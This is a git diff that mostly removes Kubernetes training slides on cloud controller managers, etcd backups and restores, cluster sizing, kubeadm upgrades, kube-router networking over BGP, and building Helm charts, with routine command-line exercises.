- There is an [ongoing effort](https://github.com/kubernetes/kubernetes/tree/master/pkg/cloudprovider) to move everything to out-of-tree providers
---
## In-tree providers
The following providers are actively maintained:
- Amazon Web Services
- Azure
- Google Compute Engine
- IBM Cloud
- OpenStack
- VMware vSphere
These ones are less actively maintained:
- Apache CloudStack
- oVirt
- VMware Photon
---
## Out-of-tree providers
The list includes the following providers:
- DigitalOcean
- keepalived (not exactly a cloud; provides VIPs for load balancers)
- Linode
- Oracle Cloud Infrastructure
(And possibly others; there is no central registry for these.)
---
## Audience questions
- What kind of clouds are you using / planning to use?
- What kind of details would you like to see in this section?
- Would you appreciate details on clouds that you don't / won't use?
---
## Cloud Controller Manager in practice
- Write a configuration file
(typically `/etc/kubernetes/cloud.conf`)
- Run the CCM process
(on self-hosted clusters, this can be a DaemonSet selecting the control plane nodes)
- Start kubelet with `--cloud-provider=external`
- When using managed clusters, this is done automatically
- There is very little documentation to write the configuration file
(except for OpenStack)
---
## Bootstrapping challenges
- When a node joins the cluster, it needs to obtain a signed TLS certificate
- That certificate must contain the node's addresses
- These addresses are provided by the Cloud Controller Manager
(at least the external address)
- To get these addresses, the node needs to communicate with the control plane
- ... Which means joining the cluster
(The problem didn't occur when cloud-specific code was running in kubelet: kubelet could obtain the required information directly from the cloud provider's metadata service.)
---
## More information about CCM
- CCM configuration and operation is highly specific to each cloud provider
(which is why this section remains very generic)
- The Kubernetes documentation has *some* information:
- [architecture and diagrams](https://kubernetes.io/docs/concepts/architecture/cloud-controller/)
- [configuration](https://kubernetes.io/docs/concepts/cluster-administration/cloud-providers/) (mainly for OpenStack)
- [deployment](https://kubernetes.io/docs/tasks/administer-cluster/running-cloud-controller/)

View File

@@ -1,362 +0,0 @@
# Backing up clusters
- Backups can have multiple purposes:
- disaster recovery (servers or storage are destroyed or unreachable)
- error recovery (human or process has altered or corrupted data)
- cloning environments (for testing, validation ...)
- Let's see the strategies and tools available with Kubernetes!
---
## Important
- Kubernetes helps us with disaster recovery
(it gives us replication primitives)
- Kubernetes helps us to clone / replicate environments
(all resources can be described with manifests)
- Kubernetes *does not* help us with error recovery
- We still need to backup / snapshot our data:
- with database backups (mysqldump, pgdump, etc.)
- and/or snapshots at the storage layer
- and/or traditional full disk backups
---
## In a perfect world ...
- The deployment of our Kubernetes clusters is automated
(recreating a cluster takes less than a minute of human time)
- All the resources (Deployments, Services...) on our clusters are under version control
(never use `kubectl run`; always apply YAML files coming from a repository)
- Stateful components are either:
- stored on systems with regular snapshots
- backed up regularly to an external, durable storage
- outside of Kubernetes
---
## Kubernetes cluster deployment
- If our deployment system isn't fully automated, it should at least be documented
- Litmus test: how long does it take to deploy a cluster ...
- for a senior engineer?
- for a new hire?
- Does it require external intervention?
(e.g. provisioning servers, signing TLS certs ...)
---
## Plan B
- Full machine backups of the control plane can help
- If the control plane is in pods (or containers), pay attention to storage drivers
(if the backup mechanism is not container-aware, the backups can take way more resources than they should, or even be unusable!)
- If the previous sentence worries you:
**automate the deployment of your clusters!**
---
## Managing our Kubernetes resources
- Ideal scenario:
- never create a resource directly on a cluster
- push to a code repository
- a special branch (`production` or even `master`) gets automatically deployed
- Some folks call this "GitOps"
(it's the logical evolution of configuration management and infrastructure as code)
---
## GitOps in theory
- What do we keep in version control?
- For very simple scenarios: source code, Dockerfiles, scripts
- For real applications: add resources (as YAML files)
- For applications deployed multiple times: Helm, Kustomize ...
(staging and production count as "multiple times")
---
## GitOps tooling
- Various tools exist (Weave Flux, GitKube...)
- These tools are still very young
- You still need to write YAML for all your resources
- There is no tool to:
- list *all* resources in a namespace
- get resource YAML in a canonical form
- diff YAML descriptions with current state
---
## GitOps in practice
- Start describing your resources with YAML
- Leverage a tool like Kustomize or Helm
- Make sure that you can easily deploy to a new namespace
(or even better: to a new cluster)
- When tooling matures, you will be ready
---
## Plan B
- What if we can't describe everything with YAML?
- What if we manually create resources and forget to commit them to source control?
- What about global resources, that don't live in a namespace?
- How can we be sure that we saved *everything*?
---
## Backing up etcd
- All objects are saved in etcd
- etcd data should be relatively small
(and therefore, quick and easy to back up)
- Two options to back up etcd:
- snapshot the data directory
- use `etcdctl snapshot`
---
## Making an etcd snapshot
- The basic command is simple:
```bash
etcdctl snapshot save <filename>
```
- But we also need to specify:
- an environment variable to specify that we want etcdctl v3
- the address of the server to back up
- the path to the key, certificate, and CA certificate
<br/>(if our etcd uses TLS certificates)
---
## Snapshotting etcd on kubeadm
- The following command will work on clusters deployed with kubeadm
(and maybe others)
- It should be executed on a master node
```bash
docker run --rm --net host -v $PWD:/vol \
-v /etc/kubernetes/pki/etcd:/etc/kubernetes/pki/etcd:ro \
-e ETCDCTL_API=3 k8s.gcr.io/etcd:3.3.10 \
etcdctl --endpoints=https://[127.0.0.1]:2379 \
--cacert=/etc/kubernetes/pki/etcd/ca.crt \
--cert=/etc/kubernetes/pki/etcd/healthcheck-client.crt \
--key=/etc/kubernetes/pki/etcd/healthcheck-client.key \
snapshot save /vol/snapshot
```
- It will create a file named `snapshot` in the current directory
---
## How can we remember all these flags?
- Look at the static pod manifest for etcd
(in `/etc/kubernetes/manifests`)
- The healthcheck probe is calling `etcdctl` with all the right flags
😉👍✌️
- Exercise: write the YAML for a batch job to perform the backup
---
## Restoring an etcd snapshot
- ~~Execute exactly the same command, but replacing `save` with `restore`~~
(Believe it or not, doing that will *not* do anything useful!)
- The `restore` command does *not* load a snapshot into a running etcd server
- The `restore` command creates a new data directory from the snapshot
(it's an offline operation; it doesn't interact with an etcd server)
- It will create a new data directory in a temporary container
(leaving the running etcd node untouched)
---
## When using kubeadm
1. Create a new data directory from the snapshot:
```bash
sudo rm -rf /var/lib/etcd
docker run --rm -v /var/lib:/var/lib -v $PWD:/vol \
-e ETCDCTL_API=3 k8s.gcr.io/etcd:3.3.10 \
etcdctl snapshot restore /vol/snapshot --data-dir=/var/lib/etcd
```
2. Provision the control plane, using that data directory:
```bash
sudo kubeadm init \
--ignore-preflight-errors=DirAvailable--var-lib-etcd
```
3. Rejoin the other nodes
---
## The fine print
- This only saves etcd state
- It **does not** save persistent volumes and local node data
- Some critical components (like the pod network) might need to be reset
- As a result, our pods might have to be recreated, too
- If we have proper liveness checks, this should happen automatically
---
## More information about etcd backups
- [Kubernetes documentation](https://kubernetes.io/docs/tasks/administer-cluster/configure-upgrade-etcd/#built-in-snapshot) about etcd backups
- [etcd documentation](https://coreos.com/etcd/docs/latest/op-guide/recovery.html#snapshotting-the-keyspace) about snapshots and restore
- [A good blog post by elastisys](https://elastisys.com/2018/12/10/backup-kubernetes-how-and-why/) explaining how to restore a snapshot
- [Another good blog post by consol labs](https://labs.consol.de/kubernetes/2018/05/25/kubeadm-backup.html) on the same topic
---
## Don't forget ...
- Also back up the TLS information
(at the very least: CA key and cert; API server key and cert)
- With clusters provisioned by kubeadm, this is in `/etc/kubernetes/pki`
- If you don't:
- you will still be able to restore etcd state and bring everything back up
- you will need to redistribute user certificates
.warning[**TLS information is highly sensitive!
<br/>Anyone who has it has full access to your cluster!**]
---
## Stateful services
- It's totally fine to keep your production databases outside of Kubernetes
*Especially if you have only one database server!*
- Feel free to put development and staging databases on Kubernetes
(as long as they don't hold important data)
- Using Kubernetes for stateful services makes sense if you have *many*
(because then you can leverage Kubernetes automation)
---
## Snapshotting persistent volumes
- Option 1: snapshot volumes out of band
(with the API/CLI/GUI of our SAN/cloud/...)
- Option 2: storage system integration
(e.g. [Portworx](https://docs.portworx.com/portworx-install-with-kubernetes/storage-operations/create-snapshots/) can [create snapshots through annotations](https://docs.portworx.com/portworx-install-with-kubernetes/storage-operations/create-snapshots/snaps-annotations/#taking-periodic-snapshots-on-a-running-pod))
- Option 3: [snapshots through Kubernetes API](https://kubernetes.io/blog/2018/10/09/introducing-volume-snapshot-alpha-for-kubernetes/)
(now in alpha for a few storage providers: GCE, OpenSDS, Ceph, Portworx)
---
## More backup tools
- [Stash](https://appscode.com/products/stash/)
back up Kubernetes persistent volumes
- [ReShifter](https://github.com/mhausenblas/reshifter)
cluster state management
- ~~Heptio Ark~~ [Velero](https://github.com/heptio/velero)
full cluster backup
- [kube-backup](https://github.com/pieterlange/kube-backup)
simple scripts to save resource YAML to a git repository

View File

@@ -1,167 +0,0 @@
# Cluster sizing
- What happens when the cluster gets full?
- How can we scale up the cluster?
- Can we do it automatically?
- What are other methods to address capacity planning?
---
## When are we out of resources?
- kubelet monitors node resources:
- memory
- node disk usage (typically the root filesystem of the node)
- image disk usage (where container images and RW layers are stored)
- For each resource, we can provide two thresholds:
- a hard threshold (if it's met, it provokes immediate action)
- a soft threshold (provokes action only after a grace period)
- Resource thresholds and grace periods are configurable
(by passing kubelet command-line flags)
---
## What happens then?
- If disk usage is too high:
- kubelet will try to remove terminated pods
- then, it will try to *evict* pods
- If memory usage is too high:
- it will try to evict pods
- The node is marked as "under pressure"
- This temporarily prevents new pods from being scheduled on the node
---
## Which pods get evicted?
- kubelet looks at the pods' QoS and PriorityClass
- First, pods with BestEffort QoS are considered
- Then, pods with Burstable QoS exceeding their *requests*
(but only if the exceeding resource is the one that is low on the node)
- Finally, pods with Guaranteed QoS, and Burstable pods within their requests
- Within each group, pods are sorted by PriorityClass
- If there are pods with the same PriorityClass, they are sorted by usage excess
(i.e. the pods whose usage exceeds their requests the most are evicted first)
---
class: extra-details
## Eviction of Guaranteed pods
- *Normally*, pods with Guaranteed QoS should not be evicted
- A chunk of resources is reserved for node processes (like kubelet)
- It is expected that these processes won't use more than this reservation
- If they do use more resources anyway, all bets are off!
- If this happens, kubelet must evict Guaranteed pods to preserve node stability
(or Burstable pods that are still within their requested usage)
---
## What happens to evicted pods?
- The pod is terminated
- It is marked as `Failed` at the API level
- If the pod was created by a controller, the controller will recreate it
- The pod will be recreated on another node, *if there are resources available!*
- For more details about the eviction process, see:
- [this documentation page](https://kubernetes.io/docs/tasks/administer-cluster/out-of-resource/) about resource pressure and pod eviction,
- [this other documentation page](https://kubernetes.io/docs/concepts/configuration/pod-priority-preemption/) about pod priority and preemption.
---
## What if there are no resources available?
- Sometimes, a pod cannot be scheduled anywhere:
- all the nodes are under pressure,
- or the pod requests more resources than are available
- The pod then remains in `Pending` state until the situation improves
---
## Cluster scaling
- One way to improve the situation is to add new nodes
- This can be done automatically with the [Cluster Autoscaler](https://github.com/kubernetes/autoscaler/tree/master/cluster-autoscaler)
- The autoscaler will automatically scale up:
- if there are pods that failed to be scheduled
- The autoscaler will automatically scale down:
- if nodes have a low utilization for an extended period of time
---
## Restrictions, gotchas ...
- The Cluster Autoscaler only supports a few cloud infrastructures
(see [here](https://github.com/kubernetes/autoscaler/tree/master/cluster-autoscaler/cloudprovider) for a list)
- The Cluster Autoscaler cannot scale down nodes that have pods using:
- local storage
- affinity/anti-affinity rules preventing them from being rescheduled
- a restrictive PodDisruptionBudget
---
## Other way to do capacity planning
- "Running Kubernetes without nodes"
- Systems like [Virtual Kubelet](https://virtual-kubelet.io/) or Kiyot can run pods using on-demand resources
- Virtual Kubelet can leverage e.g. ACI or Fargate to run pods
- Kiyot runs pods in ad-hoc EC2 instances (1 instance per pod)
- Economic advantage (no wasted capacity)
- Security advantage (stronger isolation between pods)
Check [this blog post](http://jpetazzo.github.io/2019/02/13/running-kubernetes-without-nodes-with-kiyot/) for more details.

View File

@@ -1,309 +0,0 @@
# Upgrading clusters
- It's *recommended* to run consistent versions across a cluster
(mostly to have feature parity and latest security updates)
- It's not *mandatory*
(otherwise, cluster upgrades would be a nightmare!)
- Components can be upgraded one at a time without problems
---
## Checking what we're running
- It's easy to check the version for the API server
.exercise[
- Log into node `test1`
- Check the version of kubectl and of the API server:
```bash
kubectl version
```
]
- In a HA setup with multiple API servers, they can have different versions
- Running the command above multiple times can return different values
---
## Node versions
- It's also easy to check the version of kubelet
.exercise[
- Check node versions (includes kubelet, kernel, container engine):
```bash
kubectl get nodes -o wide
```
]
- Different nodes can run different kubelet versions
- Different nodes can run different kernel versions
- Different nodes can run different container engines
---
## Control plane versions
- If the control plane is self-hosted (running in pods), we can check it
.exercise[
- Show image versions for all pods in `kube-system` namespace:
```bash
kubectl --namespace=kube-system get pods -o json \
| jq -r '
.items[]
| [.spec.nodeName, .metadata.name]
+
(.spec.containers[].image | split(":"))
| @tsv
' \
| column -t
```
]
---
## What version are we running anyway?
- When I say, "I'm running Kubernetes 1.11", is that the version of:
- kubectl
- API server
- kubelet
- controller manager
- something else?
---
## Other versions that are important
- etcd
- kube-dns or CoreDNS
- CNI plugin(s)
- Network controller, network policy controller
- Container engine
- Linux kernel
---
## General guidelines
- To update a component, use whatever was used to install it
- If it's a distro package, update that distro package
- If it's a container or pod, update that container or pod
- If you used configuration management, update with that
---
## Know where your binaries come from
- Sometimes, we need to upgrade *quickly*
(when a vulnerability is announced and patched)
- If we are using an installer, we should:
- make sure it's using upstream packages
- or make sure that whatever packages it uses are current
- make sure we can tell it to pin specific component versions
---
## In practice
- We are going to update a few cluster components
- We will change the kubelet version on one node
- We will change the version of the API server
- We will work with cluster `test` (nodes `test1`, `test2`, `test3`)
---
## Updating kubelet
- These nodes have been installed using the official Kubernetes packages
- We can therefore use `apt` or `apt-get`
.exercise[
- Log into node `test3`
- View available versions for package `kubelet`:
```bash
apt show kubelet -a | grep ^Version
```
- Upgrade kubelet:
```bash
apt install kubelet=1.14.2-00
```
]
---
## Checking what we've done
.exercise[
- Log into node `test1`
- Check node versions:
```bash
kubectl get nodes -o wide
```
- Create a deployment and scale it to make sure that the node still works
]
---
## Updating the API server
- This cluster has been deployed with kubeadm
- The control plane runs in *static pods*
- These pods are started automatically by kubelet
(even when kubelet can't contact the API server)
- They are defined in YAML files in `/etc/kubernetes/manifests`
(this path is set by a kubelet command-line flag)
- kubelet automatically updates the pods when the files are changed
---
## Changing the API server version
- We will edit the YAML file to use a different image version
.exercise[
- Log into node `test1`
- Check API server version:
```bash
kubectl version
```
- Edit the API server pod manifest:
```bash
sudo vim /etc/kubernetes/manifests/kube-apiserver.yaml
```
- Look for the `image:` line, and update it to e.g. `v1.14.0`
]
---
## Checking what we've done
- The API server will be briefly unavailable while kubelet restarts it
.exercise[
- Check the API server version:
```bash
kubectl version
```
]
---
## Updating the whole control plane
- As an example, we'll use kubeadm to upgrade the entire control plane
(note: this is possible only because the cluster was installed with kubeadm)
.exercise[
- Check what will be upgraded:
```bash
sudo kubeadm upgrade plan
```
(Note: kubeadm is confused by our manual upgrade of the API server.
<br/>It thinks the cluster is running 1.14.0!)
<!-- ##VERSION## -->
- Perform the upgrade:
```bash
sudo kubeadm upgrade apply v1.14.2
```
]
---
## Updating kubelets
- After updating the control plane, we need to update each kubelet
- This requires to run a special command on each node, to download the config
(this config is generated by kubeadm)
.exercise[
- Download the configuration on each node, and upgrade kubelet:
```bash
for N in 1 2 3; do
ssh node$N sudo kubeadm upgrade node config --kubelet-version v1.14.2
ssh node $N sudo apt install kubelet=1.14.2-00
done
```
]
---
## Checking what we've done
- All our nodes should now be updated to version 1.14.2
.exercise[
- Check nodes versions:
```bash
kubectl get nodes -o wide
```
]

View File

@@ -1,684 +0,0 @@
# The Container Network Interface
- Allows us to decouple network configuration from Kubernetes
- Implemented by *plugins*
- Plugins are executables that will be invoked by kubelet
- Plugins are responsible for:
- allocating IP addresses for containers
- configuring the network for containers
- Plugins can be combined and chained when it makes sense
---
## Combining plugins
- Interface could be created by e.g. `vlan` or `bridge` plugin
- IP address could be allocated by e.g. `dhcp` or `host-local` plugin
- Interface parameters (MTU, sysctls) could be tweaked by the `tuning` plugin
The reference plugins are available [here].
Look into each plugin's directory for its documentation.
[here]: https://github.com/containernetworking/plugins/tree/master/plugins
---
## How does kubelet know which plugins to use?
- The plugin (or list of plugins) is set in the CNI configuration
- The CNI configuration is a *single file* in `/etc/cni/net.d`
- If there are multiple files in that directory, the first one is used
(in lexicographic order)
- That path can be changed with the `--cni-conf-dir` flag of kubelet
---
## CNI configuration in practice
- When we set up the "pod network" (like Calico, Weave...) it ships a CNI configuration
(and sometimes, custom CNI plugins)
- Very often, that configuration (and plugins) is installed automatically
(by a DaemonSet featuring an initContainer with hostPath volumes)
- Examples:
- Calico [CNI config](https://github.com/projectcalico/calico/blob/1372b56e3bfebe2b9c9cbf8105d6a14764f44159/v2.6/getting-started/kubernetes/installation/hosted/calico.yaml#L25)
and [volume](https://github.com/projectcalico/calico/blob/1372b56e3bfebe2b9c9cbf8105d6a14764f44159/v2.6/getting-started/kubernetes/installation/hosted/calico.yaml#L219)
- kube-router [CNI config](https://github.com/cloudnativelabs/kube-router/blob/c2f893f64fd60cf6d2b6d3fee7191266c0fc0fe5/daemonset/generic-kuberouter.yaml#L10)
and [volume](https://github.com/cloudnativelabs/kube-router/blob/c2f893f64fd60cf6d2b6d3fee7191266c0fc0fe5/daemonset/generic-kuberouter.yaml#L73)
---
## Conf vs conflist
- There are two slightly different configuration formats
- Basic configuration format:
- holds configuration for a single plugin
- typically has a `.conf` name suffix
- has a `type` string field in the top-most structure
- [examples](https://github.com/containernetworking/cni/blob/master/SPEC.md#example-configurations)
- Configuration list format:
- can hold configuration for multiple (chained) plugins
- typically has a `.conflist` name suffix
- has a `plugins` list field in the top-most structure
- [examples](https://github.com/containernetworking/cni/blob/master/SPEC.md#network-configuration-lists)
---
class: extra-details
## How plugins are invoked
- Parameters are given through environment variables, including:
- CNI_COMMAND: desired operation (ADD, DEL, CHECK, or VERSION)
- CNI_CONTAINERID: container ID
- CNI_NETNS: path to network namespace file
- CNI_IFNAME: how the network interface should be named
- The network configuration must be provided to the plugin on stdin
(this avoids race conditions that could happen by passing a file path)
---
## In practice: kube-router
- We are going to set up a new cluster
- For this new cluster, we will use kube-router
- kube-router will provide the "pod network"
(connectivity with pods)
- kube-router will also provide internal service connectivity
(replacing kube-proxy)
---
## How kube-router works
- Very simple architecture
- Does not introduce new CNI plugins
(uses the `bridge` plugin, with `host-local` for IPAM)
- Pod traffic is routed between nodes
(no tunnel, no new protocol)
- Internal service connectivity is implemented with IPVS
- Can provide pod network and/or internal service connectivity
- kube-router daemon runs on every node
---
## What kube-router does
- Connect to the API server
- Obtain the local node's `podCIDR`
- Inject it into the CNI configuration file
(we'll use `/etc/cni/net.d/10-kuberouter.conflist`)
- Obtain the addresses of all nodes
- Establish a *full mesh* BGP peering with the other nodes
- Exchange routes over BGP
---
## What's BGP?
- BGP (Border Gateway Protocol) is the protocol used between internet routers
- It [scales](https://www.cidr-report.org/as2.0/)
pretty [well](https://www.cidr-report.org/cgi-bin/plota?file=%2fvar%2fdata%2fbgp%2fas2.0%2fbgp-active%2etxt&descr=Active%20BGP%20entries%20%28FIB%29&ylabel=Active%20BGP%20entries%20%28FIB%29&with=step)
(it is used to announce the 700k CIDR prefixes of the internet)
- It is spoken by many hardware routers from many vendors
- It also has many software implementations (Quagga, Bird, FRR...)
- Experienced network folks generally know it (and appreciate it)
- It also used by Calico (another popular network system for Kubernetes)
- Using BGP allows us to interconnect our "pod network" with other systems
---
## The plan
- We'll work in a new cluster (named `kuberouter`)
- We will run a simple control plane (like before)
- ... But this time, the controller manager will allocate `podCIDR` subnets
- We will start kube-router with a DaemonSet
- This DaemonSet will start one instance of kube-router on each node
---
## Logging into the new cluster
.exercise[
- Log into node `kuberouter1`
- Clone the workshop repository:
```bash
git clone https://@@GITREPO@@
```
- Move to this directory:
```bash
cd container.training/compose/kube-router-k8s-control-plane
```
]
---
## Our control plane
- We will use a Compose file to start the control plane
- It is similar to the one we used with the `kubenet` cluster
- The API server is started with `--allow-privileged`
(because we will start kube-router in privileged pods)
- The controller manager is started with extra flags too:
`--allocate-node-cidrs` and `--cluster-cidr`
- We need to edit the Compose file to set the Cluster CIDR
---
## Starting the control plane
- Our cluster CIDR will be `10.C.0.0/16`
(where `C` is our cluster number)
.exercise[
- Edit the Compose file to set the Cluster CIDR:
```bash
vim docker-compose.yaml
```
- Start the control plane:
```bash
docker-compose up
```
]
---
## The kube-router DaemonSet
- In the same directory, there is a `kuberouter.yaml` file
- It contains the definition for a DaemonSet and a ConfigMap
- Before we load it, we also need to edit it
- We need to indicate the address of the API server
(because kube-router needs to connect to it to retrieve node information)
---
## Creating the DaemonSet
- The address of the API server will be `http://A.B.C.D:8080`
(where `A.B.C.D` is the address of `kuberouter1`, running the control plane)
.exercise[
- Edit the YAML file to set the API server address:
```bash
vim kuberouter.yaml
```
- Create the DaemonSet:
```bash
kubectl create -f kuberouter.yaml
```
]
Note: the DaemonSet won't create any pods (yet) since there are no nodes (yet).
---
## Generating the kubeconfig for kubelet
- This is similar to what we did for the `kubenet` cluster
.exercise[
- Generate the kubeconfig file (replacing `X.X.X.X` with the address of `kuberouter1`):
```bash
kubectl --kubeconfig ~/kubeconfig config \
set-cluster kubenet --server http://`X.X.X.X`:8080
kubectl --kubeconfig ~/kubeconfig config \
set-context kubenet --cluster kubenet
kubectl --kubeconfig ~/kubeconfig config\
use-context kubenet
```
]
---
## Distributing kubeconfig
- We need to copy that kubeconfig file to the other nodes
.exercise[
- Copy `kubeconfig` to the other nodes:
```bash
for N in 2 3; do
scp ~/kubeconfig kuberouter$N:
done
```
]
---
## Starting kubelet
- We don't need the `--pod-cidr` option anymore
(the controller manager will allocate these automatically)
- We need to pass `--network-plugin=cni`
.exercise[
- Join the first node:
```bash
sudo kubelet --kubeconfig ~/kubeconfig --network-plugin=cni
```
- Open more terminals and join the other nodes:
```bash
ssh kuberouter2 sudo kubelet --kubeconfig ~/kubeconfig --network-plugin=cni
ssh kuberouter3 sudo kubelet --kubeconfig ~/kubeconfig --network-plugin=cni
```
]
---
## Setting up a test
- Let's create a Deployment and expose it with a Service
.exercise[
- Create a Deployment running a web server:
```bash
kubectl create deployment web --image=jpetazzo/httpenv
```
- Scale it so that it spans multiple nodes:
```bash
kubectl scale deployment web --replicas=5
```
- Expose it with a Service:
```bash
kubectl expose deployment web --port=8888
```
]
---
## Checking that everything works
.exercise[
- Get the ClusterIP address for the service:
```bash
kubectl get svc web
```
- Send a few requests there:
```bash
curl `X.X.X.X`:8888
```
]
Note that if you send multiple requests, they are load-balanced in a round robin manner.
This shows that we are using IPVS (vs. iptables, which picked random endpoints).
---
## Troubleshooting
- What if we need to check that everything is working properly?
.exercise[
- Check the IP addresses of our pods:
```bash
kubectl get pods -o wide
```
- Check our routing table:
```bash
route -n
ip route
```
]
We should see the local pod CIDR connected to `kube-bridge`, and the other nodes' pod CIDRs having individual routes, with each node being the gateway.
---
## More troubleshooting
- We can also look at the output of the kube-router pods
(with `kubectl logs`)
- kube-router also comes with a special shell that gives lots of useful info
(we can access it with `kubectl exec`)
- But with the current setup of the cluster, these options may not work!
- Why?
---
## Trying `kubectl logs` / `kubectl exec`
.exercise[
- Try to show the logs of a kube-router pod:
```bash
kubectl -n kube-system logs ds/kube-router
```
- Or try to exec into one of the kube-router pods:
```bash
kubectl -n kube-system exec kuber-router-xxxxx bash
```
]
These commands will give an error message that includes:
```
dial tcp: lookup kuberouterX on 127.0.0.11:53: no such host
```
What does that mean?
---
## Internal name resolution
- To execute these commands, the API server needs to connect to kubelet
- By default, it creates a connection using the kubelet's name
(e.g. `http://kuberouter1:...`)
- This requires our nodes names to be in DNS
- We can change that by setting a flag on the API server:
`--kubelet-preferred-address-types=InternalIP`
---
## Another way to check the logs
- We can also ask the logs directly to the container engine
- First, get the container ID, with `docker ps` or like this:
```bash
CID=$(docker ps
--filter label=io.kubernetes.pod.namespace=kube-system
--filter label=io.kubernetes.container.name=kube-router)
```
- Then view the logs:
```bash
docker logs $CID
```
---
class: extra-details
## Other ways to distribute routing tables
- We don't need kube-router and BGP to distribute routes
- The list of nodes (and associated `podCIDR` subnets) is available through the API
- This shell snippet generates the commands to add all required routes on a node:
```bash
NODES=$(kubectl get nodes -o name | cut -d/ -f2)
for DESTNODE in $NODES; do
if [ "$DESTNODE" != "$HOSTNAME" ]; then
echo $(kubectl get node $DESTNODE -o go-template="
route add -net {{.spec.podCIDR}} gw {{(index .status.addresses 0).address}}")
fi
done
```
- This could be useful for embedded platforms with very limited resources
(or lab environments for learning purposes)
---
# Interconnecting clusters
- We assigned different Cluster CIDRs to each cluster
- This allows us to connect our clusters together
- We will leverage kube-router BGP abilities for that
- We will *peer* each kube-router instance with a *route reflector*
- As a result, we will be able to ping each other's pods
---
## Disclaimers
- There are many methods to interconnect clusters
- Depending on your network implementation, you will use different methods
- The method shown here only works for nodes with direct layer 2 connection
- We will often need to use tunnels or other network techniques
---
## The plan
- Someone will start the *route reflector*
(typically, that will be the person presenting these slides!)
- We will update our kube-router configuration
- We will add a *peering* with the route reflector
(instructing kube-router to connect to it and exchange route information)
- We should see the routes to other clusters on our nodes
(in the output of e.g. `route -n` or `ip route show`)
- We should be able to ping pods of other nodes
---
## Starting the route reflector
- Only do this if you are doing this on your own
- There is a Compose file in the `compose/frr-route-reflector` directory
- Before continuing, make sure that you have the IP address of the route reflector
---
## Configuring kube-router
- This can be done in two ways:
- with command-line flags to the `kube-router` process
- with annotations to Node objects
- We will use the command-line flags
(because it will automatically propagate to all nodes)
.footnote[Note: with Calico, this is achieved by creating a BGPPeer CRD.]
---
## Updating kube-router configuration
- We need to add two command-line flags to the kube-router process
.exercise[
- Edit the `kuberouter.yaml` file
- Add the following flags to the kube-router arguments,:
```
- "--peer-router-ips=`X.X.X.X`"
- "--peer-router-asns=64512"
```
(Replace `X.X.X.X` with the route reflector address)
- Update the DaemonSet definition:
```bash
kubectl apply -f kuberouter.yaml
```
]
---
## Restarting kube-router
- The DaemonSet will not update the pods automatically
(it is using the default `updateStrategy`, which is `OnDelete`)
- We will therefore delete the pods
(they will be recreated with the updated definition)
.exercise[
- Delete all the kube-router pods:
```bash
kubectl delete pods -n kube-system -l k8s-app=kube-router
```
]
Note: the other `updateStrategy` for a DaemonSet is RollingUpdate.
<br/>
For critical services, we might want to precisely control the update process.
---
## Checking peering status
- We can see informative messages in the output of kube-router:
```
time="2019-04-07T15:53:56Z" level=info msg="Peer Up"
Key=X.X.X.X State=BGP_FSM_OPENCONFIRM Topic=Peer
```
- We should see the routes of the other clusters show up
- For debugging purposes, the reflector also exports a route to 1.0.0.2/32
- That route will show up like this:
```
1.0.0.2 172.31.X.Y 255.255.255.255 UGH 0 0 0 eth0
```
- We should be able to ping the pods of other clusters!
---
## If we wanted to do more ...
- kube-router can also export ClusterIP addresses
(by adding the flag `--advertise-cluster-ip`)
- They are exported individually (as /32)
- This would allow us to easily access other clusters' services
(without having to resolve the individual addresses of pods)
- Even better if it's combined with DNS integration
(to facilitate name → ClusterIP resolution)

View File

@@ -130,14 +130,6 @@ class: pic
---
class: pic
![One of the best Kubernetes architecture diagrams available](images/k8s-arch4-thanks-luxas.png)
---
class: extra-details
## Running the control plane on special nodes
- It is common to reserve a dedicated node for the control plane
@@ -160,8 +152,6 @@ class: extra-details
---
class: extra-details
## Running the control plane outside containers
- The services of the control plane can run in or out of containers
@@ -181,8 +171,6 @@ class: extra-details
---
class: extra-details
## Do we need to run Docker at all?
No!
@@ -199,8 +187,6 @@ No!
---
class: extra-details
## Do we need to run Docker at all?
Yes!
@@ -223,8 +209,6 @@ Yes!
---
class: extra-details
## Do we need to run Docker at all?
- On our development environments, CI pipelines ... :
@@ -241,21 +225,25 @@ class: extra-details
---
## Interacting with Kubernetes
## Kubernetes resources
- We will interact with our Kubernetes cluster through the Kubernetes API
- The Kubernetes API defines a lot of objects called *resources*
- The Kubernetes API is (mostly) RESTful
- It allows us to create, read, update, delete *resources*
- These resources are organized by type, or `Kind` (in the API)
- A few common resource types are:
- node (a machine — physical or virtual — in our cluster)
- pod (group of containers running together on a node)
- service (stable network endpoint to connect to one or multiple containers)
- namespace (more-or-less isolated group of things)
- secret (bundle of sensitive data to be passed to a container)
And much more!
- We can see the full list by running `kubectl api-resources`
(In Kubernetes 1.10 and prior, the command to list API resources was `kubectl get`)
---
@@ -265,16 +253,22 @@ class: pic
---
class: pic
![One of the best Kubernetes architecture diagrams available](images/k8s-arch4-thanks-luxas.png)
---
## Credits
- The first diagram is courtesy of Lucas Käldström, in [this presentation](https://speakerdeck.com/luxas/kubeadm-cluster-creation-internals-from-self-hosting-to-upgradability-and-ha)
- it's one of the best Kubernetes architecture diagrams available!
- The second diagram is courtesy of Weave Works
- The first diagram is courtesy of Weave Works
- a *pod* can have multiple containers working together
- IP addresses are associated with *pods*, not with individual containers
- The second diagram is courtesy of Lucas Käldström, in [this presentation](https://speakerdeck.com/luxas/kubeadm-cluster-creation-internals-from-self-hosting-to-upgradability-and-ha)
- it's one of the best Kubernetes architecture diagrams available!
Both diagrams used with permission.

View File

@@ -1,114 +0,0 @@
## Creating a chart
- We are going to show a way to create a *very simplified* chart
- In a real chart, *lots of things* would be templatized
(Resource names, service types, number of replicas...)
.exercise[
- Create a sample chart:
```bash
helm create dockercoins
```
- Move away the sample templates and create an empty template directory:
```bash
mv dockercoins/templates dockercoins/default-templates
mkdir dockercoins/templates
```
]
---
## Exporting the YAML for our application
- The following section assumes that DockerCoins is currently running
.exercise[
- Create one YAML file for each resource that we need:
.small[
```bash
while read kind name; do
kubectl get -o yaml --export $kind $name > dockercoins/templates/$name-$kind.yaml
done <<EOF
deployment worker
deployment hasher
daemonset rng
deployment webui
deployment redis
service hasher
service rng
service webui
service redis
EOF
```
]
]
---
## Testing our helm chart
.exercise[
- Let's install our helm chart! (`dockercoins` is the path to the chart)
```
helm install dockercoins
```
]
--
- Since the application is already deployed, this will fail:<br>
`Error: release loitering-otter failed: services "hasher" already exists`
- To avoid naming conflicts, we will deploy the application in another *namespace*
---
## Switching to another namespace
- We can create a new namespace and switch to it
(Helm will automatically use the namespace specified in our context)
- We can also tell Helm which namespace to use
.exercise[
- Tell Helm to use a specific namespace:
```bash
helm install dockercoins --namespace=magenta
```
]
---
